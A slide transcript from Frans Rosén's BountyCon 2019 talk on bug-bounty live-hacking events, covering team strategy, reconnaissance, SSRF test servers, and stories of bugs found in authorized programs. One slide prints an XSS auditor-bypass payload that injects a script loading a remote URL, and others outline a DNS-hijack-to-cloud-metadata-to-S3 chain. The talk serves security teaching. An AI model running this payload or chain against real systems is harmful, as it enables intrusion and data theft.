Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Live Hacking like a MVH – A walkthrough on methodology and strategies to win big

Frans Rosén
March 30, 2019

Live Hacking like a MVH – A walkthrough on methodology and strategies to win big

These are the slides from by talk at the Facebook/Google hosted event BountyCon 2019 held in Singapore on the 30th of March 2019.

Frans Rosén

March 30, 2019
Tweet

More Decks by Frans Rosén

Other Decks in Research

Transcript

  1. View Slide

  2. Live Hacking like a MVH – 

    A walkthrough on methodology
    and strategies to win big
    Frans Rosén – @fransrosen

    View Slide

  3. Frans Rosén – @fransrosen
    Frans Rosén @fransrosen
    Security Advisor at Detectify
    #6 on HackerOne leaderboard/all-time
    Blogs at labs.detectify.com

    View Slide

  4. Frans Rosén – @fransrosen
    Frans Rosén @fransrosen
    H1-702 2017: Winner of MVH in Vegas! (Uber, Salesforce, Zenefits)

    H1-514 2018: Winner of MVH in Montreal! (Shopify)

    H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath)
    H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath)
    H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath)
    H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber)
    H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath)

    H1-202 2018: Winner Best bug in Washington (Mapbox)

    H1-3120 2018: Winner Best bug in Amsterdam (Dropbox)
    H1-514 2018: Winner Highest reputation in Montreal (Shopify)

    View Slide

  5. Frans Rosén – @fransrosen
    Frans Rosén @fransrosen
    H1-702 2017: Winner of MVH in Vegas! (Uber, Salesforce, Zenefits)

    H1-514 2018: Winner of MVH in Montreal! (Shopify)

    H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath)
    H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath)
    H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath)
    H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber)
    H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath)

    H1-202 2018: Winner Best bug in Washington (Mapbox)

    H1-3120 2018: Winner Best bug in Amsterdam (Dropbox)
    H1-514 2018: Winner Highest reputation in Montreal (Shopify)

    View Slide

  6. Frans Rosén – @fransrosen
    What is Live Hacking?

    View Slide

  7. Frans Rosén – @fransrosen
    30 second elevator pitch
    • A "hacker-meets-dev face-to-face" bug bounty with special targets
    • First by HackerOne in 2016 in Vegas
    • More companies runs these nowadays.

    H1, Bugcrowd, Facebook/Google, Visma. Smaller companies run their own also

    View Slide

  8. Frans Rosén – @fransrosen
    (Inofficial first event in 2015)
    Me and Justin Calmus, then CSO at Zenefits drinking Old fashioneds in Vegas
    "We should bring some hackers together and hack"

    View Slide

  9. Frans Rosén – @fransrosen
    (Inofficial first event in 2015)
    Me and Justin Calmus, then CSO at Zenefits drinking Old fashioneds in Vegas
    "We should bring some hackers together and hack"

    View Slide

  10. Frans Rosén – @fransrosen
    (Inofficial first event in 2015)
    Night after, 7 hackers in a suite at MGM

    View Slide

  11. Frans Rosén – @fransrosen
    $101.000 paid that night!
    I went home with $51.000 after 7 hours of hacking

    View Slide

  12. Frans Rosén – @fransrosen
    A quick step by step

    View Slide

  13. Frans Rosén – @fransrosen
    1. Hackers gets an intro and a walkthrough
    • Hangout, slides, presented by the company itself
    • Ability to ask questions

    View Slide

  14. Frans Rosén – @fransrosen
    1. Hackers gets an intro and a walkthrough
    • Hangout, slides, presented by the company itself
    • Ability to ask questions
    2. Often a bigger scope
    • Often *.company.com, *.company.dev, infrastructure, IPs
    • Open source repos by the company
    • Enterprise access to products
    • One time social engineering(!)

    View Slide

  15. Frans Rosén – @fransrosen
    3. Hackers gets some time do do recon
    • This is a VERY important part
    • One time 48 hours. Hard!
    • Slack instance with the company!

    View Slide

  16. Frans Rosén – @fransrosen
    3. Hackers gets some time do do recon
    • This is a VERY important part
    • One time 48 hours. Hard!
    • Slack instance with the company!
    4. Some allow pre-submissions
    • Awesome! Less preasure on final day
    • Faster payouts on event day

    View Slide

  17. Frans Rosén – @fransrosen
    5. Arriving to event, meeting the company
    • At HQ or hacking event (Defcon, Black Hat, Nullcon etc)
    • Discussions here == PRICELESS!!
    • Valid bugs because I could discuss with the company
    - This domain, what does it do?

    - Is this app supposed to work like this?

    - I noticed this weird behaviour, I think I can do this, what do you think?

    View Slide

  18. Frans Rosén – @fransrosen
    6. Day of event. Wake up early, shower and HACK
    • If no pre-submissions, get reports in!
    • Hacking day is special, sit in teams, collaboration(!)
    • Found many bugs on the actual day!

    View Slide

  19. Frans Rosén – @fransrosen
    Some events 

    without pre-submissions 

    awards "first X valid bugs"

    View Slide

  20. Frans Rosén – @fransrosen
    Enter bountyplz!

    View Slide

  21. Frans Rosén – @fransrosen
    github.com/fransr/bountyplz

    View Slide

  22. Frans Rosén – @fransrosen
    github.com/fransr/bountyplz

    View Slide

  23. Frans Rosén – @fransrosen
    github.com/fransr/bountyplz

    View Slide

  24. Frans Rosén – @fransrosen
    github.com/fransr/bountyplz

    View Slide

  25. Frans Rosén – @fransrosen
    github.com/fransr/bountyplz
    Upcoming version, batch-mode
    • 24 reports sent in 4 seconds

    View Slide

  26. Frans Rosén – @fransrosen
    7. Show & Tell
    • Best part of event
    • Customer picks bugs to be presented
    • Amazing! Other hacker’s bugs in a cool micro-talk style (5min max)

    View Slide

  27. Frans Rosén – @fransrosen
    Strategy/Methodology

    View Slide

  28. Frans Rosén – @fransrosen
    Strategy/Methodology
    The most interesting part. How to approach targets?
    This is my experience, other might do differently!

    View Slide

  29. Frans Rosén – @fransrosen
    Good overview of scope
    Make sure you have/know:
    • credentials needed
    • what domains are included, subdomains/acquisitions
    • what NOT to focus on (out-of-scope)
    • upgrades to enterprise accounts if promised

    View Slide

  30. Frans Rosén – @fransrosen
    Teaming

    View Slide

  31. Frans Rosén – @fransrosen
    Teaming!
    Seriously, this is EXTREMELY VALUABLE
    I’ve made more money hacking as a team

    View Slide

  32. Frans Rosén – @fransrosen
    Teaming!
    Team up with someone that:
    • put in "similar" effort to you
    • might know stuff you don't
    • helps you cover more target surface
    • you can communicate with and brainstorm

    View Slide

  33. Frans Rosén – @fransrosen
    Teaming!
    Team up with someone that:
    • put in "similar" effort to you
    • might know stuff you don't
    • helps you cover more target surface
    • you can communicate with and brainstorm
    Keep team small, 2-4.
    If 3 or more, effort will differ, allow to split differently

    For 2 people, 50% each is always the simplest.

    View Slide

  34. Frans Rosén – @fransrosen
    What do focus on?

    View Slide

  35. Frans Rosén – @fransrosen
    High threshold or labour intensive testing
    • Best bugs!


    View Slide

  36. Frans Rosén – @fransrosen
    High threshold or labour intensive testing
    • Best bugs!


    Example: trying all integrations from a list of 80.

    Read docs on how each worked


    Found a $20k bug due to one (1!!!) faulty implementation!

    View Slide

  37. Frans Rosén – @fransrosen
    How SDK talks with API
    • Desktop client
    • Web (API-paths in JS-files)
    • PHP/Java/Golang-SDKs
    • npm/composer/yarn


    View Slide

  38. Frans Rosén – @fransrosen
    How SDK talks with API
    • Desktop client
    • Web (API-paths in JS-files)
    • PHP/Java/Golang-SDKs
    • npm/composer/yarn
    Legacy versions of APIs?
    • Older versions working?
    • Are there docs? Web-archive?


    View Slide

  39. Frans Rosén – @fransrosen
    Integrations with 3rd parties (!)
    • Have integrations? (Slack, Trello, Zapier etc)
    • Allow integrations? (OAuth etc)
    • Public repos with examples?


    View Slide

  40. Frans Rosén – @fransrosen
    Integrations with 3rd parties (!)
    • Have integrations? (Slack, Trello, Zapier etc)
    • Allow integrations? (OAuth etc)
    • Public repos with examples?

    Company's Github repos
    • What software they use (Forks)
    • Synched with original repo? (No: vulns by diffing versions?)


    View Slide

  41. Frans Rosén – @fransrosen
    Github
    • Internal domains? Search in Gists, Github, Google
    • "Internal indicators", search everywhere
    • Domains/AWS/GCP-tools in org: "org:xxx amazonaws" etc

    View Slide

  42. Frans Rosén – @fransrosen
    Github
    • Internal domains? Search in Gists, Github, Google
    • "Internal indicators", search everywhere
    • Domains/AWS/GCP-tools in org: "org:xxx amazonaws" etc
    • Any users in organization?
    • Extract contributors from repos
    • Company name in users’ repos: "user:xxx company-name"
    • Search Github Issues, funky stuff by accident!
    • Non-forked repos in organization
    ‣ Package dependencies from employees?
    ‣ Still hired by the company?
    If not, bad

    View Slide

  43. Frans Rosén – @fransrosen
    Whitebox testing on company's FOSS
    • Bugs might mean bugs in prod!
    • Might mean company made other companies vulnerable 

    (really bad PR for the company)

    View Slide

  44. Frans Rosén – @fransrosen
    Whitebox testing on company's FOSS
    • Bugs might mean bugs in prod!
    • Might mean company made other companies vulnerable 

    (really bad PR for the company)
    LEGACY
    • Content from web-archive, read old documentation(!!!)
    • URLs from web-archive's CDX-api, commoncrawl etc.
    • Test all URLs. Distinguish status-codes / bytes received (Wfuzz)
    • Anything interesting? Filter file-types, deduplicate

    View Slide

  45. Frans Rosén – @fransrosen
    Regular recon
    There is soooo much here we can't cover it all. These are general things
    • DNS, Subbrute, sublist3r etc. So many tools!
    ‣ Customized subbrute with 3rd party data
    ‣ Generate DNS-wordlist based on findings
    • Existing routes from JS-files, Burp History
    • postMessage-tracker (logs all listener functions)
    • Wfuzz target (VPN with switchable IP if blocked)

    View Slide

  46. Frans Rosén – @fransrosen
    Regular recon
    There is soooo much here we can't cover it all. These are general things
    • DNS, Subbrute, sublist3r etc. So many tools!
    ‣ Customized subbrute with 3rd party data
    ‣ Generate DNS-wordlist based on findings
    • Existing routes from JS-files, Burp History
    • postMessage-tracker (logs all listener functions)
    • Wfuzz target (VPN with switchable IP if blocked)
    Best protip:
    Focus on BORING/HARD STUFF, other hackers won’t

    View Slide

  47. Frans Rosén – @fransrosen
    Notes
    While you hack. KISS!
    • Dir for target, TXT-file always open
    • Comments (snippets / indicators / urls)
    • Super helpful. Chaining bugs!

    - If an Open-Redirect, we can make a chain
    • Test-code, SDKs, screenshots in dir
    • Valid vulns in one place, separate from "interesting behaviour"

    View Slide

  48. Frans Rosén – @fransrosen
    Notes
    • On event, team up sharing "interesting behaviour" things
    • Burp history is golden, save it! Search alot! 


    Found bugs by searching:

    View Slide

  49. Frans Rosén – @fransrosen
    SSRF-testing server
    • ONLY reachable by internal network (Both ipv4/ipv6)
    • Virtual host / kubernetes node is bad, due to requirement of Host-header.

    Not all SSRF send proper Host-header 

    (HTTP/1.0, binding external DNS-host to internal IP etc)

    • Different files, depends on SSRF:

    MP3, ICS, XML, TXT, HTML, PNG, JPG, SVG etc.

    • If internal hosts can be reached without scanning internal network.

    One company had flags in files, simple to prove you could access.

    View Slide

  50. Frans Rosén – @fransrosen
    SSRF-testing server
    Should be an open source project

    Anyone up for it?

    View Slide

  51. Frans Rosén – @fransrosen

    View Slide

  52. Frans Rosén – @fransrosen
    Show & Tell!

    View Slide

  53. Frans Rosén – @fransrosen
    Unscoped JWT-token exposed in
    Squid proxy-error

    View Slide

  54. Frans Rosén – @fransrosen
    On-Premise/SaaS app

    View Slide

  55. Frans Rosén – @fransrosen
    Did not like internal requests

    View Slide

  56. Frans Rosén – @fransrosen
    But we see our own request headers

    View Slide

  57. Frans Rosén – @fransrosen
    And what about IPv6?

    View Slide

  58. Frans Rosén – @fransrosen
    Wow, a LOT more headers

    View Slide

  59. Frans Rosén – @fransrosen
    And here’s a JWT?
    JWT

    View Slide

  60. Frans Rosén – @fransrosen
    Nothing in the JWT said anything about my instance

    View Slide

  61. Frans Rosén – @fransrosen
    Sent a report

    View Slide

  62. Frans Rosén – @fransrosen
    Sent a Slack-DM to the company and asked

    View Slide

  63. Frans Rosén – @fransrosen

    View Slide

  64. Frans Rosén – @fransrosen

    View Slide

  65. Frans Rosén – @fransrosen
    ?

    View Slide

  66. Frans Rosén – @fransrosen
    JWT-token could access everyone

    View Slide

  67. Frans Rosén – @fransrosen
    Fix! Unique ID instead of admin

    View Slide

  68. Frans Rosén – @fransrosen

    View Slide

  69. Frans Rosén – @fransrosen
    Second order RCE 4 hours later

    View Slide

  70. Frans Rosén – @fransrosen
    Burp Collaborator payload gave a hit!

    View Slide

  71. Frans Rosén – @fransrosen
    Burp Collaborator payload gave a hit!
    WTH??

    View Slide

  72. Frans Rosén – @fransrosen
    Let’s trigger "a few"

    View Slide

  73. Frans Rosén – @fransrosen
    Burp Intruder

    View Slide

  74. Frans Rosén – @fransrosen
    Header

    View Slide

  75. Frans Rosén – @fransrosen
    Header

    View Slide

  76. Frans Rosén – @fransrosen
    Header

    View Slide

  77. Frans Rosén – @fransrosen
    Header

    View Slide

  78. Frans Rosén – @fransrosen
    Header

    View Slide

  79. Frans Rosén – @fransrosen
    XSS on sandboxed domain

    stealing data from privileged domain

    View Slide

  80. Frans Rosén – @fransrosen
    Document-service
    ACME.COM
    Create new doc

    View Slide

  81. Frans Rosén – @fransrosen
    Document-service
    ACME.COM
    Create new doc
    usersandbox.com
    postMessage

    View Slide

  82. Frans Rosén – @fransrosen
    Document-service
    ACME.COM
    Create new doc
    usersandbox.com
    postMessage
    {"document":"AAA…"}

    View Slide

  83. Frans Rosén – @fransrosen
    XSS in the sandbox
    usersandbox.com

    View Slide

  84. Frans Rosén – @fransrosen
    Chrome XSS auditor bypass

    
<br/>x=document.createElement('script');
<br/>x.src=atob('MY-URL-BASE64-ENCODED');
<br/>document.body.appendChild(x)-'%0d',({//#<br/>

    View Slide

  85. Frans Rosén – @fransrosen
    User opens link from sandbox
    usersandbox.com
    ACME.COM
    Create new doc

    View Slide

  86. Frans Rosén – @fransrosen
    User uploads doc, iframe opens
    usersandbox.com
    ACME.COM
    Create new doc
    usersandbox.com

    View Slide

  87. Frans Rosén – @fransrosen
    Hijack iframe, due to Same-Origin Policy
    usersandbox.com
    ACME.COM
    Create new doc
    usersandbox.com

    View Slide

  88. Frans Rosén – @fransrosen
    Uploads doc, postMessage
    usersandbox.com
    ACME.COM
    usersandbox.com

    View Slide

  89. Frans Rosén – @fransrosen
    Iframe leaks data to attacker
    usersandbox.com
    ACME.COM
    usersandbox.com

    View Slide

  90. Frans Rosén – @fransrosen
    We stole the document!
    usersandbox.com
    ACME.COM
    usersandbox.com

    View Slide

  91. Frans Rosén – @fransrosen
    We stole the document!
    usersandbox.com
    ACME.COM
    usersandbox.com

    View Slide

  92. Frans Rosén – @fransrosen
    DNS-hijack leading to RCE

    View Slide

  93. Frans Rosén – @fransrosen
    DNS-hijack on internal.company.com!

    View Slide

  94. Frans Rosén – @fransrosen
    Not a new thing, watch my talk from Secfest 2017

    View Slide

  95. Frans Rosén – @fransrosen
    DNS-hijack on
    internal.company.com!
    Awesome, what now?

    View Slide

  96. Frans Rosén – @fransrosen
    Testing tool, only allowed their own subdomains

    View Slide

  97. Frans Rosén – @fransrosen
    Testing tool, only allowed their own subdomains

    View Slide

  98. Frans Rosén – @fransrosen
    Let’s create a subdomain to metadata

    View Slide

  99. Frans Rosén – @fransrosen
    Let’s create a subdomain to metadata

    View Slide

  100. Frans Rosén – @fransrosen
    IPv6 FTW!

    View Slide

  101. Frans Rosén – @fransrosen
    BOOM!

    View Slide

  102. Frans Rosén – @fransrosen
    Asking to go deeper

    View Slide

  103. Frans Rosén – @fransrosen
    Asking to go deeper

    View Slide

  104. Frans Rosén – @fransrosen
    Asking to go deeper
    Nothing. Creds are limited :(

    View Slide

  105. Frans Rosén – @fransrosen
    User-data

    View Slide

  106. Frans Rosén – @fransrosen
    User-data
    S3-bucket

    View Slide

  107. Frans Rosén – @fransrosen
    And yeeees! Full read/write access to S3-bucket

    View Slide

  108. Frans Rosén – @fransrosen
    Files in bucket used in deploy-script

    View Slide

  109. Frans Rosén – @fransrosen
    Best bug of the event

    View Slide

  110. Frans Rosén – @fransrosen
    Final words
    1. Use the time before
    2. Consuming tasks no one bothers
    3. Move around, but if interesting, be persistent!
    4. Work as a team, it’s amazing.
    Thank you!

    View Slide